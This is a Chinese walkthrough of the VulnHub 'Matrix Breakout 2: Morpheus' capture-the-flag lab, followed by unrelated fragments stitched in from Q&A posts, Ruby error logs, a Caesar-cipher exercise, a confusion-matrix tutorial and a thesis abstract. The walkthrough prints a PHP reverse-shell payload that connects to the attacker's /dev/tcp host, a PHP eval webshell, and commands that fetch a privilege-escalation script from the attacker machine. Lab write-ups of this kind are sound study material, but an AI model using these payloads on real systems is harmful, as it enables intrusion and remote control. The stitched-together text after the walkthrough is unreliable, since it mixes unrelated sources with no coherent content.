靶机搭建:vulnhub上是说vbox里更合适。可能有vbox版本兼容问题,我用的vmware导入。
靶场下载地址:https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
网络模式:桥接。
一:信息收集






ffuf -u http://192.168.1.35/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,html
gobuster dir -u http://192.168.1.35 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip



这里是一个file变量,改变file变量可以直接对靶机文件修改,能随意创建文件。准备反弹shell。
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.34/8888 0>&1'"); ?>


3;发现一个txt的文件。提示,和一张图片。
www-data@morpheus:/$ ls -al

要找到cypher的密码!!

4;访问一下图片,把图片复制到kali里面去,可能藏着东西喔。
复制不了的,也可以下载。
wget http://192.168.1.35/.cypher-neo.png

binwalk -w cypher-neo.png
binwalk -e cypher-neo.png --run-as=root
换这个工具查看隐藏信息,然后提取出来,然后提示我们加--run-as=root,之后目录下会多个目录,
zlib这个提取不太会,就换个方式吧!等哪天有大佬从这儿解了,我再来更新学习吧!
https://www.cnblogs.com/ainsliaea/p/15780903.html
https://blog.csdn.net/qq_40574571/article/details/80164981

5:传信息收集的工具上去,
python3 -m http.server 8000
wget http://192.168.1.34:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh


这里我们用这个:

到这的话我们就提权成功了。前面让我们找到cypher的密码,zlib不会提取,试试爆破!家目录下有个flag。
python3 -c 'import pty; pty.spawn("/bin/bash")' 把权限变成交互式shell。
没爆破出来!


也可以写个马,连接蚁剑看看文件里面有没有什么信息。
<?php eval(@$_POST['password']);?>


1:目录扫描,多用几种工具,dirb、gobuster、dirsearch ,ffuf等。
2:写入shell:通过抓包写入反弹 shell,写一句话木马连接工具。
关闭。这个问题是opinion-based.它目前不接受答案。想要改进这个问题?更新问题,以便editingthispost可以用事实和引用来回答它.关闭9年前。Improvethisquestion首先,我想避免一场关于语言的口水战。可供选择的语言有Perl、Python和Ruby。我想提一下,我对所有这些都很满意,但问题是我不能只专注于一个。例如,如果我看到一个很棒的Perl模块,我必须尝试一下。如果我看到一个不错的Python应用程序,我必须知道它是如何制作的。如果我看到RubyDSL或一些Ruby巫术,我就会迷上Ruby一段时间。目前我是一名Java开发人员,但计划在不久的将来
描述恺撒密码是古罗马凯撒大帝用来对军事情报进行加解密的算法,它采用了替换方法对信息中的每一个英文字符循环替换为字母表序列中该字符后面的第三个字符,即,字母表的对应关系如下:原文:ABCDEFGHIJKLMNOPQRSTUVWXYZ
在使用Rubyv2.2.2的ElCapitan(MacOSX10.11.1)上安装Rails时,出现以下错误:ERROR:Errorinstallingnokogiri:ERROR:Failedtobuildgemnativeextension./Users/jon/.rvm/rubies/ruby-2.2.2/bin/ruby-r./siteconf20151117-26799-ux15fd.rbextconf.rb--use-system-librariescheckingiftheCcompileraccepts...***extconf.rbfailed***Couldnotc
我理解RubystdlibMatrix是不可修改的,也就是说,例如。m=Matrix.zero(3,4)不会写m[0,1]=7但我非常想做...我可以用笨拙的编程来做,比如defmodify_value_in_a_matrix(matrix,row,col,newval)ary=(0...m.row_size).map{|i|m.rowi}.map(&:to_a)ary[row][col]=newvalMatrix[*ary]end...或者作弊,比如Matrix.send:[]=,0,1,7但我想知道,这一定是人们一直遇到的问题。有没有一些标准的、习惯的方法可以做到这一点,而不必使用
我有一段文本需要扫描,每行至少包含2部分信息,有时包含4部分信息。问题是每一行可能是15-20种不同操作中的一种。在ruby中,当前代码看起来像这样:text.split("\n").eachdo|line|#around20times................expressions['actions'].eachdo|pat,reg|#around20times.................这显然是“问题所在”。通过将所有正则表达式合并为一个,我确实设法使其更快(在C++中提高了50%),但这仍然不是我需要的速度——我需要快速解析数千个这些文件!现在我将它们与正则表达式
1.这里介绍由 sklearn.metrics.ConfusionMatrixDisplay 所给出的关于混淆矩阵的一个小例子,来进行理解混淆矩阵及如何应用混淆矩阵来对数据进行分析2.先了解混淆矩阵的一些基本信息,这里规定正类为1,负类为0TP(TruePositives):预测为1,而真实的也为1(即正类判断为正类,1判断为1)TN(TrueNegatives):预测为0,真实的也为0 (即负类判断为负类,0判断为0)FP(FalsePositives):预测为1,真实的为0 (即负类判断为正类,将0判断为了1)FN(FalseNegatives):预测为0,真实为1 (即正类
B-3:Linux系统渗透提权任务环境说明:服务器场景:Server2204(关闭链接)用户名:hacker密码:123456使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;Flag:2283/tcp使用渗透机对服务器信息收集,并将服务器中主机名称作为flag提交;Flag:KipZ1eze使用渗透机对服务器信息收集&
在日常的生活和工作中,住宅与部门的安全防范、单位的文件档案、财务报表以及一些个人资料的保存多以加锁的办法来解决。若使用传统的机械式钥匙开锁,人们常需携带多把钥匙, 使用极不方便, 且钥匙丢失后安全性即大打折扣。在安全技术防范领域,具有防盗报警功能的电子密码锁逐渐代替了传统的机械式密码锁,电子密码锁具有安全性高、成本低、功耗低、易操作等优点。本文主要介绍运用51单片机设计数字密码锁的方法。本设计采用自上而下的数字系统设计方法,将数字密码锁系统分解为若干子系统,并且进一步细划为若干模块,然后用C语言来设计这些模块,通过KEIL软件编译,并且进行实机调试。调试结果表明:该数字密码锁能够效验4位十进制
使用RVM,我尝试在安装Fedora15后安装ree-1.8.7-2011.03,但出现以下错误。在Ubuntu11.04上使用rvminstallree-1.8.7-2011.03工作正常..与Fedora15上的MRIruby-1.8.7-p334相同的错误(和解决方案)。关于如何解决这个问题有什么想法吗?make[1]:Enteringdirectory`/home/ryguy/.rvm/src/ree-1.8.7-2011.03/source/ext/dl'gcc-I/opt/local/include-I.-I/opt/local/include-I../..-I../.
有没有一种简单的方法可以将时间四舍五入到最接近的15分钟?这就是我目前正在做的事情。有更简单的方法吗?t=Time.newrounded_t=Time.local(t.year,t.month,t.day,t.hour,t.min/15*15) 最佳答案 您说的是“向下舍入”,所以我不确定您实际上是在寻找回合数还是底数,但这是执行这两项操作的代码。如果将round_off和floor方法添加到Time类,我认为这样的内容读起来真的很好。额外的好处是您可以更轻松地按任何时间分区舍入。require'active_support/cor